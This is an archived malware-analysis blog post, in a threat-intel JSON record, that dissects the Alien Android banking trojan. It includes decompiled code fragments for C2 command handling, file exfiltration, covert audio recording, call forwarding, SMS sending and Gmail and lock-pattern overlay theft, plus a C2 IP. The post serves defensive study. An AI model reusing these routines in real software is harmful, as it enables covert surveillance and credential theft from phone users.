{ "id": "1aee30fd-2f83-4a07-b55d-6b310afead04", "created_at": "2026-04-06T01:32:07.833068Z", "updated_at": "2026-04-10T03:36:13.973992Z", "deleted_at": null, "sha1_hash": "24ad813e844afa215a0ca2caa366747fcde5fc86", "title": "Technical analysis of Alien android malware", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 249075, "plain_text": "Technical analysis of Alien android malware\r\nBy Muhammad Hasan Ali\r\nPublished: 2022-09-25 · Archived: 2026-04-06 01:11:59 UTC\r\n10 minute read\r\nبسم الله الرحمن الرحيم\r\nFreePalestine\r\nUnpackingPermalink\r\nIf you opened the sample in JEB decompiler, you will find classes names are obfuscated and contains nop code\r\nwhich makes the analysis of the code more harder and it’s an indicator that the sample is packed. So we need to\r\nget the decrypted payload. We will use this script with Frida to get the payload. I explained in details how to\r\nunpack a sample here and here.\r\nAfter unpacking the sample and get the payload, we see the strings is encrypted using Base64 and other ecryption\r\nroutine. The encryption routine found in d located in com.mhiauaqmlacl.ypmsfwbkjhsbeoz . We will use this\r\nJEB script but we will change the key value to tycusvgndour . Then add the script to the JEB decompiler. To add\r\nthe script, press F2 and Create then copy the script from github and paste it. To run the script, select the\r\nencrypted string and press execute the decrypted strings will be a comment. One by one you will find yourself\r\ndecrypting all the strings and start analyzing the payload. Big thanks to Axelle Ap. for all the scripts.\r\nhttps://muha2xmad.github.io/malware-analysis/alien/\r\nPage 1 of 13\n\nFigure(1): decrypting keys and C2 server\r\nTeamViewer helps the devilPermalink\r\nThis an amazing technique which allow the malware to do malicious things even if the user is opening the device.\r\nThe malware will open an overlay screen which tells the user that there's a system update you need to wait .\r\nWhile the overlay screen is set over the screen, the malware will do malicious actions by conneecting to\r\nTeamViewer app.\r\nFigure(2): Fake system update\r\n if(s2.contains(this.a(\"ZWJkNzMyYWFkYjM1NzUwYWJkYTkxYTVlNDgyMDdlZDhiMGNh\"))) { // connect_teamviewer\r\n JSONObject jSONObject6 = new JSONObject(s2);\r\n this.a.e(this, this.b.aK, jSONObject6.getString(this.a(\"ZWJkNzMyYWFkYjM1NzUwYWJkYTkxYTVlNDgy\r\n this.a.e(this, this.b.aL, jSONObject6.getString(this.a(\"ZjhkOTJmYjdjOTM5NzMzMQ==\"))); // pa\r\n this.a.e(this, this.b.aO, jSONObject6.getString(this.a(\"ZWVkOTM3YTE=\"))); // fake\r\nhttps://muha2xmad.github.io/malware-analysis/alien/\r\nPage 2 of 13\n\nthis.a.e(this, this.b.aM, jSONObject6.getString(this.a(\"ZTBkMTM4YTBkYjM4\"))); // hidden\r\n this.a.e(this, this.b.aN, jSONObject6.getString(this.a(\"ZWFkNDMzYTdkNTNmNmYzMg==\"))); // bl\r\n this.a.f(this);\r\n i.f(this, this.a(\"ZWJkNzMxZWFjYTMzNjAzOGJmYTUxZTQ0NWIzYjM1YzdiYWNiOTZiODljYTY5MTNhZGFlYQ==\")\r\n goto label_5;\r\n }\r\n if(s2.contains(this.a(\"ZTdjODM5YWFlMTIyNjQzNGE0YmExMjU2NDkyYzY5\"))) { // open_teamviewer\r\n JSONObject jSONObject7 = new JSONObject(s2);\r\n this.a.e(this, this.b.aO, jSONObject7.getString(this.a(\"ZWVkOTM3YTE=\"))); // fake\r\n this.a.e(this, this.b.aM, jSONObject7.getString(this.a(\"ZTBkMTM4YTBkYjM4\"))); // hidden\r\n this.a.e(this, this.b.aN, jSONObject7.getString(this.a(\"ZWFkNDMzYTdkNTNmNmYzMg==\"))); // bl\r\n this.a.f(this);\r\n i.f(this, this.a(\"ZWJkNzMxZWFjYTMzNjAzOGJmYTUxZTQ0NWIzYjM1YzdiYWNiOTZiODljYTY5MTNhZGFlYQ==\")\r\n goto label_5;\r\n }\r\n if(s2.contains(this.a(\"ZmJkZDMyYTBlMTI1NjQyMWJkYTUxNTU0NGQ=\"))) { // send_settings\r\n JSONObject jSONObject8 = new JSONObject(s2);\r\n this.a.e(this, this.b.aO, jSONObject8.getString(this.a(\"ZWVkOTM3YTE=\"))); // fake\r\n this.a.e(this, this.b.aM, jSONObject8.getString(this.a(\"ZTBkMTM4YTBkYjM4\"))); // hidden\r\n this.a.e(this, this.b.aN, jSONObject8.getString(this.a(\"ZWFkNDMzYTdkNTNmNmYzMg==\"))); // bl\r\n this.a.f(this);\r\n goto label_5;\r\n }\r\n if(!s2.contains(this.a(\"ZWNkZDJhYWRkZDMzNWUyMGE3YTAxNDUwNTU=\"))) { // device_unlock\r\n goto label_5; // device_unlock\r\n }\r\n JSONObject jSONObject9 = new JSONObject(s2);\r\n this.a.e(this, this.b.aO, jSONObject9.getString(this.a(\"ZWVkOTM3YTE=\"))); // fake\r\n this.a.e(this, this.b.aM, jSONObject9.getString(this.a(\"ZTBkMTM4YTBkYjM4\"))); // hidden\r\n this.a.e(this, this.b.aN, jSONObject9.getString(this.a(\"ZWFkNDMzYTdkNTNmNmYzMg==\"))); // blocki\r\n goto label_553;\r\n catch(Exception unused_ex) {\r\n }\r\nData exfiltrationPermalink\r\nThe malware has the ability to exfiltrate the data and sending specific files to the C2 server from the vitim’s\r\ndevice.\r\nif(s2.contains(this.a(\"ZTdjODM5YWFlMTMwNmUzOWFkYTkwOQ==\"))) { // open_folder\r\n String s3 = new JSONObject(s2).getString(this.a(\"ZTdjODM5YWFlMTMwNmUzOWFkYTkwOQ==\")); // op\r\nhttps://muha2xmad.github.io/malware-analysis/alien/\r\nPage 3 of 13\n\nif(s3.equals(this.a(\"ZjY5Nw==\"))) { // ~/\r\n s3 = Environment.getExternalStorageDirectory().getAbsolutePath();\r\n }\r\n String[] arr_s = this.a.b(new File(s3));\r\n try {\r\n JSONObject jSONObject1 = new JSONObject();\r\n jSONObject1.put(this.a(\"ZWJkNTM4\"), this.a(\"ZTljYTJlYTVjNzA5NjczY2E1YTkwODZjNTgyNjc3Y2Ji\r\n \r\n jSONObject1.put(this.a(\"ZWNkMTJl\"), i.e(s3)); // dir\r\n jSONObject1.put(this.a(\"ZWVkNzMwYTBkYjI0NzI=\"), i.e(arr_s[0])); // folders\r\n jSONObject1.put(this.a(\"ZWVkMTMwYTFjZA==\"), i.e(arr_s[1])); // files\r\n String s4 = jSONObject1.toString().replace(\"\\\\n\", \"\");\r\n this.a.a(this.a(\"YzJlYjEzOGFlMTA1NDQxYjhk\"), s4); // JSON_SEND\r\n this.a.i(this, this.b.H + this.a.h(s4));\r\n goto label_5;\r\n }\r\n catch(JSONException unused_ex) {\r\n }\r\n this.a.a(this.c, this.a(\"Y2RjYTJlYWJjYzc2NmIyNmE2YTI1YjQxNWYzZDNiYzVhNmQ3OGNjNDk0YjY5NjM0Y2N\r\n goto label_5;\r\n }\r\n if(!s2.contains(this.a(\"ZmRjODMwYWJkZjMyNjgzYmFkOTMxZDVhNTIyYw==\"))) { // uploadind_file\r\n goto label_273; // uploadind_file\r\n }\r\n jSONObject2 = new JSONObject(s2);\r\n \r\nCollected dataPermalink\r\nThe malware will collect data from the victim’s device such as battery percentage, language used on device,\r\nAccessibility Service status, phone number of the used line, Google accounts, and permissions obtained from the\r\ndevice. Then send it to the C2 server.\r\n try { // DM\r\n jSONObject0.put(jwozx0.a(\"Y2NmNQ==\"), s2); // DM\r\n jSONObject0.put(jwozx0.a(\"YzlmYw==\"), jwozx0.a(\"ZTZjZDMwYTg=\")); // null\r\n // AD\r\n jSONObject0.put(jwozx0.a(\"Y2FmNA==\"), i.battary_percentage(context0)); // BL\r\n jSONObject0.put(jwozx0.a(\"ZGNlZg==\"), jwozx0.a.sharedpref(context1, c0.af)); // TW\r\n String s3 = jwozx0.a(\"ZGJmOQ==\"); // SA\r\n String phone_num = i.s(this) ? \"Yjk=\" : \"Yjg=\"; // 0\r\n // 1\r\nhttps://muha2xmad.github.io/malware-analysis/alien/\r\nPage 4 of 13\n\nString s5 = jwozx0.a(phone_num);\r\n jSONObject0.put(s3, s5);\r\n jSONObject0.put(jwozx0.a(\"ZGJlOA==\"), jwozx0.a.sharedpref(context1, c0.ar)); // SP\r\n jSONObject0.put(jwozx0.a(\"ZGJlYg==\"), i.u(context0)); // SS\r\n jSONObject0.put(jwozx0.a(\"YzRmZA==\"), Locale.getDefault().getLanguage()); // LE\r\n String s6 = jwozx0.a(\"ZGJlMQ==\"); // SY\r\n String phone_num = i.accessibility_status(context1, ojfiq.class) ? \"Yjk=\" : \"Yjg=\"; // 0\r\n // 1\r\n String s8 = jwozx0.a(phone_num);\r\n jSONObject0.put(s6, s8);\r\n jSONObject0.put(jwozx0.a(\"ZGJmNQ==\"), i.default_sms_pkg(this)); // SM\r\n jSONObject0.put(jwozx0.a(\"YzFmYw==\"), s1); // ID\r\n jSONObject0.put(jwozx0.a(\"YzFlYg==\"), jwozx0.a.sharedpref(context1, c0.ae)); // IS\r\n String s9 = jwozx0.a(\"YzZlYQ==\"); // NR\r\n String phone_num = context1.checkCallingOrSelfPermission(jwozx0.a.a.p) == 0 ? ((TelephonyManager)con\r\n jSONObject0.put(s9, phone_num);\r\n jSONObject0.put(jwozx0.a(\"Y2ZmOQ==\"), i.google_acc(this)); // GA\r\n jSONObject0.put(jwozx0.a(\"ZDhlYg==\"), i.check_permission(jwozx0, c0.q[0])); // PS\r\n jSONObject0.put(jwozx0.a(\"ZDhmYg==\"), i.check_permission(jwozx0, c0.q[1])); // PC\r\n jSONObject0.put(jwozx0.a(\"ZDhlOA==\"), i.check_permission(jwozx0, c0.q[2])); // PP\r\n jSONObject0.put(jwozx0.a(\"ZDhmNw==\"), i.check_permission(jwozx0, c0.q[3])); // PO\r\n }\r\n catch(JSONException unused_ex) {\r\n jwozx0.a.a(s, jwozx0.a(\"Y2RlYTBlOGJlYzc2NGIwNjg2ODI1YjcwNzYwYzU4ZTRmNWZhYWRjMg==\")); // ERROR JSON\r\n }\r\nRecording audioPermalink\r\nThe malware has the ability to record audio without the knowledge of the user.\r\nprotected void onHandleIntent(Intent intent0) {\r\n try { // tick\r\n int v = Integer.parseInt(intent0.getStringExtra(this.a(\"ZmNkMTNmYWY=\"))); // tick\r\n String s = intent0.getStringExtra(this.a(\"ZTZkOTMxYTE=\")); // name\r\n if(v \u003e 0 || v == -1) {\r\n String s1 = new SimpleDateFormat(this.a(\"YzVmNTcxYTBkYTdiNzgyY2IwYjUyNDdiNzY3Mzc2YzJlZmNiOTE=\"),\r\n this.d = this.getExternalFilesDir(null) + (this.a(\"YTc=\") + s + this.a(\"ZDc=\") + s1 + this.a(\"YT\r\n \r\n \r\n this.b.a(this.a(\"Y2VmMTEwODE5ZTA0NDQxNg==\"), this.d); // FILE REC\r\n this.b.a(this.a(\"ZGNkMTMxYTE=\"), String.valueOf(v)); // Time\r\n String s2 = this.d;\r\n MediaRecorder mediaRecorder0 = new MediaRecorder();\r\n this.b.a(this.a(\"ZGJmNzA5OGFmYQ==\"), this.a(\"ZGJlYzFkOTZlYTc2NTMxMDhhODMyOTc3MWUxYTU0ZmE5YmZj\"))\r\n \r\n this.a = false;\r\nhttps://muha2xmad.github.io/malware-analysis/alien/\r\nPage 5 of 13\n\nmediaRecorder0.setAudioSource(1);\r\n mediaRecorder0.setOutputFormat(3);\r\n mediaRecorder0.setAudioEncoder(1);\r\n mediaRecorder0.setOutputFile(s2);\r\n Thread thread0 = new Thread(new Runnable() {\r\n @Override\r\n public final void run() {\r\n try {\r\n if(v == -1) {\r\n Thread.sleep(900000L);\r\n }\r\n else {\r\n Thread.sleep(v * 1000);\r\n }\r\n }\r\n catch(InterruptedException unused_ex) {\r\n izyiyumk.this.b.a(izyiyumk.this.a(\"ZGJmNzA5OGFmYQ==\"), izyiyumk.this.a(\"ZGJlYzEzOTQ5\r\n \r\n try {\r\n mediaRecorder0.stop();\r\n mediaRecorder0.release();\r\n izyiyumk.this.b.a(izyiyumk.this.a(\"Y2VmMTEwODE=\"), s2); // FILE\r\n String s = izyiyumk.this.b.j(this, izyiyumk.this.c.ba);\r\n izyiyumk.this.b.e(this, izyiyumk.this.c.ba, s + izyiyumk.this.a(\"YWI5Yjdm\") + s2\r\n if(v == -1) {\r\n if(izyiyumk.this.b.j(this, izyiyumk.this.c.aZ).equals(izyiyumk.this.a(\"Yjk=\"\r\n Intent intent0 = new Intent(this, izyiyumk.class).putExtra(izyiyumk.this\r\n \r\n \r\n \r\n izyiyumk.this.startService(intent0);\r\n return;\r\n }\r\n izyiyumk.this.b.e(this, izyiyumk.this.c.aY, \"\");\r\n return;\r\n }\r\n izyiyumk.this.b.e(this, izyiyumk.this.c.aY, \"\");\r\n }\r\n catch(Exception unused_ex) {\r\n }\r\n return;\r\n }\r\n catch(Throwable unused_ex) {\r\n return;\r\nhttps://muha2xmad.github.io/malware-analysis/alien/\r\nPage 6 of 13\n\n}\r\n izyiyumk.this.b.a(izyiyumk.this.a(\"ZGJmNzA5OGFmYQ==\"), izyiyumk.this.a(\"ZGJlYzEzOTQ5ZTA0\r\n \r\nClassic featuresPermalink\r\nCall and call forwardPermalink\r\nAfter granting all call permissions, the malware will have the ability to call or forward call.\r\n try {\r\n Intent intent0 = new Intent(\"android.intent.action.CALL\");\r\n intent0.addFlags(0x10000000);\r\n intent0.setData(Uri.parse(\"tel:\" + Uri.encode(s26)));\r\n context1.startActivity(intent0);\r\n String s27 = \"USSD: \" + s26 + \"[143523#]\";\r\n i1.a(\"USSD\", s27);\r\n i1.f(context1, i1.a.ab, s27);\r\n return;\r\n }\r\n catch(Exception unused_ex) {\r\n }\r\n try {\r\n i1.a(\"USSD\", \"Error: Start USSD\");\r\n i1.a(\"USSD\", \"Error USSD[143523#]\");\r\n i1.f(context1, i1.a.ab, \"Error USSD[143523#]\");\r\n return;\r\n label_1329:\r\n i2 = jwozx0.a;\r\n s28 = jSONObject5.getString(jwozx0.a(\"ZTY=\")); // n\r\n }\r\n catch(Exception unused_ex) {\r\n return;\r\n }\r\n try {\r\n Intent intent1 = new Intent(\"android.intent.action.CALL\");\r\n intent1.addFlags(0x10000000);\r\n intent1.setData(Uri.fromParts(\"tel\", \"*21*\" + s28 + \"#\", \"#\"));\r\n context1.startActivity(intent1);\r\n String s29 = \"ForwardCALL: \" + s28 + \"[143523#]\";\r\n i2.a(\"ForwardCall\", s29);\r\n i2.f(context1, i2.a.ab, s29);\r\nhttps://muha2xmad.github.io/malware-analysis/alien/\r\nPage 7 of 13\n\nreturn;\r\n }\r\n catch(Exception unused_ex) {\r\n }\r\nSmishingPermalink\r\nThe malware has the ability to send SMSs to any contact using the phone number of the victim. The SMS text is\r\nreceived from the C2 server then sent to another victim.\r\n public final void send_sms(Context context0, String s, String s1) {\r\n try {\r\n SmsManager smsManager0 = SmsManager.getDefault();\r\n ArrayList arrayList0 = smsManager0.divideMessage(s1);\r\n int v = 0;\r\n PendingIntent pendingIntent0 = PendingIntent.getBroadcast(context0, 0, new Intent(\"SMS_SENT\"), 0);\r\n PendingIntent pendingIntent1 = PendingIntent.getBroadcast(context0, 0, new Intent(\"SMS_DELIVERED\"),\r\n ArrayList arrayList1 = new ArrayList();\r\n ArrayList arrayList2 = new ArrayList();\r\n while(v \u003c arrayList0.size()) {\r\n arrayList2.add(pendingIntent1);\r\n arrayList1.add(pendingIntent0);\r\n ++v;\r\n }\r\n smsManager0.sendMultipartTextMessage(s, null, arrayList0, arrayList1, arrayList2);\r\n String s2 = \"Output SMS:\" + s + \" text:\" + s1 + \"[143523#]\";\r\n this.a(\"SMS\", s2);\r\n this.f(context0, this.a.ab, s2);\r\n this.h(context0, this.sharedpref(context0, this.a.Q));\r\n }\r\n catch(Exception unused_ex) {\r\n }\r\n }\r\nOverlay attackPermalink\r\nThe malware comes with classic features such as overlya attack. If a targeted APP is opened then the malware will\r\nlaunch the html file of the targeted app.\r\nprotected void onCreate(Bundle bundle0) {\r\n super.onCreate(bundle0);\r\n this.c = new WebView(this);\r\n this.c.getSettings().setJavaScriptEnabled(true);\r\n this.c.setScrollBarStyle(0);\r\nhttps://muha2xmad.github.io/malware-analysis/alien/\r\nPage 8 of 13\n\nthis.c.setWebViewClient(new b(this, 0));\r\n this.c.setWebChromeClient(new a(this, 0));\r\n this.c.loadUrl(this.b.m);\r\n this.setContentView(this.c);\r\n }\r\n @Override // android.app.Activity\r\n public void onDestroy() {\r\n super.onDestroy();\r\n this.c.removeAllViewsInLayout();\r\n this.c.removeAllViews();\r\n this.c.destroy();\r\n this.c = null;\r\n this.finish();\r\n }\r\nOne of the targeted APPs The malware will try to steal is Gmail . The malware will try to steal Gmail credential\r\nusing Overlay attack . And The malware will try to steal lockpattern using overlay attack. Then send logs to the\r\nC2 server.\r\n public void send_log_injects(String s) {\r\n if(!s.isEmpty()) {\r\n if(gtzkggpuaqjntiao.this.g.isEmpty()) {\r\n String s1 = gtzkggpuaqjntiao.this.b.b(20);\r\n gtzkggpuaqjntiao.this.g = s1;\r\n }\r\n JSONObject jSONObject0 = new JSONObject();\r\n if(gtzkggpuaqjntiao.this.f.equals(\"grabbing_pass_gmail\")) {\r\n gtzkggpuaqjntiao.this.b.e(this.mContext, gtzkggpuaqjntiao.this.a.aG, \"\");\r\n String s2 = gtzkggpuaqjntiao.this.a(\"ZWJkNzMxZWFkOTM5NmUzMmE1YTk1NTUyNTAyZDY5YzBiY2RjY2NmMTl\r\n gtzkggpuaqjntiao.this.f = s2;\r\n }\r\n if(gtzkggpuaqjntiao.this.f.equals(\"grabbing_lockpattern\")) {\r\n gtzkggpuaqjntiao.this.b.e(this.mContext, gtzkggpuaqjntiao.this.a.aI, \"\");\r\n gtzkggpuaqjntiao.this.f = \"grabbing_lockpattern\";\r\n String s3 = s.replace(i.f(gtzkggpuaqjntiao.this.a(\"YzRmYjE2ZjRkYjBlNDMzOTkxZmUxNzQ2NWYyNDRkY\r\n // ,\"type_injects\":\"pincode\",\"closed\":\"close_activity_injects\"\r\n \r\n gtzkggpuaqjntiao.this.b.f(this.mContext, gtzkggpuaqjntiao.this.a.ab, gtzkggpuaqjntiao.this.a\r\n \r\n }\r\n else {\r\n try { // application\r\n jSONObject0.put(gtzkggpuaqjntiao.this.a(\"ZTljODJjYThkNzM1NjAyMWEwYTMxNQ==\"), gtzkggpuaqj\r\nhttps://muha2xmad.github.io/malware-analysis/alien/\r\nPage 9 of 13\n\njSONObject0.put(gtzkggpuaqjntiao.this.a(\"ZWNkOTI4YTU=\"), s); // data\r\n }\r\n catch(JSONException unused_ex) {\r\n }\r\n i i0 = gtzkggpuaqjntiao.this.b;\r\n Context context0 = this.mContext;\r\n String s4 = gtzkggpuaqjntiao.this.g;\r\n String s5 = jSONObject0.toString();\r\n try {\r\n String s6 = i0.j(context0, s4);\r\n if(s6.isEmpty()) {\r\n i0.e(context0, s4, s5);\r\n }\r\n else {\r\n JSONObject jSONObject1 = new JSONObject(s6);\r\n JSONObject jSONObject2 = new JSONObject(s5);\r\n String s7 = jSONObject1.getString(\"data\");\r\n String s8 = jSONObject1.getString(\"data\");\r\n s5 = jSONObject2.getString(\"data\");\r\n i0.a(\"str_getParams\", String.valueOf(s7));\r\n i0.a(\"str_params\", String.valueOf(s5));\r\n JSONObject jSONObject3 = i.a(new JSONObject(s7), new JSONObject(s5));\r\n JSONObject jSONObject4 = new JSONObject();\r\n jSONObject4.put(\"application\", s8);\r\n jSONObject4.put(\"data\", jSONObject3.toString());\r\n i0.a(\"mergedJSON\", jSONObject4.toString());\r\n i0.e(context0, s4, jSONObject4.toString());\r\n }\r\n }\r\n catch(Exception unused_ex) {\r\n i0.a(\"JSON\", \"ERROR SettingsToAddJson\");\r\n i0.e(context0, s4, s5);\r\n }\r\nCommandsPermalink\r\nThese are all the commands which are received from the C2 server to the malware to do the malicious actions.\r\n jwozx0.a.a(s, jwozx0.a(\"ZWZkZDI4ZTRjYzIzNmYwYWFhYTExZjA5MWU=\") + jSONObject3.toString()); // get run_cmd:\r\n jSONObject5 = new JSONObject(new String(Base64.decode(jSONObject3.getString(jwozx0.a(\"ZWNkOTI4YT\r\n String s25 = jSONObject5.getString(jwozx0.a(\"ZWJkNTM4\")); // cmd\r\n switch(s25) {\r\n case \"remove_app\": {\r\n goto label_1633;\r\n }\r\nhttps://muha2xmad.github.io/malware-analysis/alien/\r\nPage 10 of 13\n\ncase \"get_all_permission\": {\r\n goto label_1761;\r\n }\r\n case \"run_socks5\": {\r\n goto label_1764;\r\n }\r\n case \"notification\": {\r\n goto label_1383;\r\n }\r\n case \"send_sms\": {\r\n jwozx0.a.send_sms(context1, jSONObject5.getString(jwozx0.a(\"ZTY=\")), jSONObject5.getStri\r\n return;\r\n }\r\n case \"run_admin_device\": {\r\n goto label_1706;\r\n }\r\n case \"sms_mailing_phonebook\": {\r\n goto label_1647;\r\n }\r\n case \"call_forward\": {\r\n goto label_1329;\r\n }\r\n case \"request_permission\": {\r\n goto label_1713;\r\n }\r\n case \"send_mailing_sms\": {\r\n jwozx0.a.a(context1, jSONObject5.getString(jwozx0.a(\"ZTY=\")), jSONObject5.getString(jwoz\r\n return;\r\n }\r\n case \"remove_bot\": {\r\n goto label_1655;\r\n }\r\n case \"grabbing_pass_gmail\": {\r\n goto label_1720;\r\n }\r\n case \"clean_cache\": {\r\n goto label_1857;\r\n }\r\n case \"ussd\": {\r\n goto label_1282;\r\n }\r\n case \"rat_connect\": {\r\n goto label_1667;\r\n }\r\n case \"get_data_logs\": {\r\n goto label_1607;\r\n }\r\nhttps://muha2xmad.github.io/malware-analysis/alien/\r\nPage 11 of 13\n\ncase \"grabbing_lockpattern\": {\r\n goto label_1737;\r\n }\r\n case \"stop_socks5\": {\r\n goto label_1801;\r\n }\r\n case \"change_url_connect\": {\r\n goto label_1673;\r\n }\r\n case \"patch_update\": {\r\n goto label_1866;\r\n }\r\n case \"url\": {\r\n goto label_1614;\r\n }\r\n case \"update_inject\": {\r\n goto label_1808;\r\n }\r\n case \"run_app\": {\r\n goto label_1621;\r\n }\r\n case \"run_record_audio\": {\r\n goto label_1815;\r\n }\r\n case \"access_notifications\": {\r\n goto label_1752;\r\n }\r\n case \"change_url_recover\": {\r\n goto label_1689;\r\n }\r\n case \"grabbing_google_authenticator2\": {\r\n goto label_1628;\r\n }\r\n }\r\nIf you want to download android malware samples, you can join apkdetect for free.\r\nIoCPermalink\r\nAPK hash: ea4960b84756fd82fe43cb2cffdbe464df6dd4d48aa10d1cefe38aa8ac6eb44d\r\nPayload (YBIw.json) hash: 603fcae1ef4062087e0e09aa377c03fcc8bbd6f3db443717957f1bfe8c4a4dae\r\nC2 server:\r\nhttp://185.255.131.145/\r\nhttps://muha2xmad.github.io/malware-analysis/alien/\r\nPage 12 of 13\n\nArticle quotePermalink\r\nكالقبلة على جبني ميت لا تساوى شيئا\r\nREFPermalink\r\nAlien Technical Analysis Report\r\nJEB script\r\nSource: https://muha2xmad.github.io/malware-analysis/alien/\r\nhttps://muha2xmad.github.io/malware-analysis/alien/\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://muha2xmad.github.io/malware-analysis/alien/" ], "report_names": [ "alien" ], "threat_actors": [ { "id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf", "created_at": "2023-01-06T13:46:38.626906Z", "updated_at": "2026-04-10T02:00:03.043681Z", "deleted_at": null, "main_name": "Tick", "aliases": [ "G0060", "Stalker Taurus", "PLA Unit 61419", "Swirl Typhoon", "Nian", "BRONZE BUTLER", "REDBALDKNIGHT", "STALKER PANDA" ], "source_name": "MISPGALAXY:Tick", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "54e55585-1025-49d2-9de8-90fc7a631f45", "created_at": "2025-08-07T02:03:24.563488Z", "updated_at": "2026-04-10T02:00:03.715427Z", "deleted_at": null, "main_name": "BRONZE BUTLER", "aliases": [ "CTG-2006 ", "Daserf", "Stalker Panda ", "Swirl Typhoon ", "Tick " ], "source_name": "Secureworks:BRONZE BUTLER", "tools": [ "ABK", "BBK", "Casper", "DGet", "Daserf", "Datper", "Ghostdown", "Gofarer", "MSGet", "Mimikatz", "Netboy", "RarStar", "Screen Capture Tool", "ShadowPad", "ShadowPy", "T-SMB", "down_new", "gsecdump" ], "source_id": "Secureworks", "reports": null }, { "id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b", "created_at": "2022-10-25T16:07:23.419513Z", "updated_at": "2026-04-10T02:00:04.591062Z", "deleted_at": null, "main_name": "Bronze Butler", "aliases": [ "Bronze Butler", "CTG-2006", "G0060", "Operation ENDTRADE", "RedBaldNight", "Stalker Panda", "Stalker Taurus", "Swirl Typhoon", "TEMP.Tick", "Tick" ], "source_name": "ETDA:Bronze Butler", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "9002 RAT", "AngryRebel", "Blogspot", "Daserf", "Datper", "Elirks", "Farfli", "Gh0st RAT", "Ghost RAT", "HOMEUNIX", "HidraQ", "HomamDownloader", "Homux", "Hydraq", "Lilith", "Lilith RAT", "McRAT", "MdmBot", "Mimikatz", "Minzen", "Moudour", "Muirim", "Mydoor", "Nioupale", "PCRat", "POISONPLUG.SHADOW", "Roarur", "RoyalRoad", "ShadowPad Winnti", "ShadowWali", "ShadowWalker", "SymonLoader", "WCE", "Wali", "Windows Credential Editor", "Windows Credentials Editor", "XShellGhost", "XXMM", "gsecdump", "rarstar" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775439127, "ts_updated_at": 1775792173, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/24ad813e844afa215a0ca2caa366747fcde5fc86.pdf", "text": "https://archive.orkl.eu/24ad813e844afa215a0ca2caa366747fcde5fc86.txt", "img": "https://archive.orkl.eu/24ad813e844afa215a0ca2caa366747fcde5fc86.jpg" } }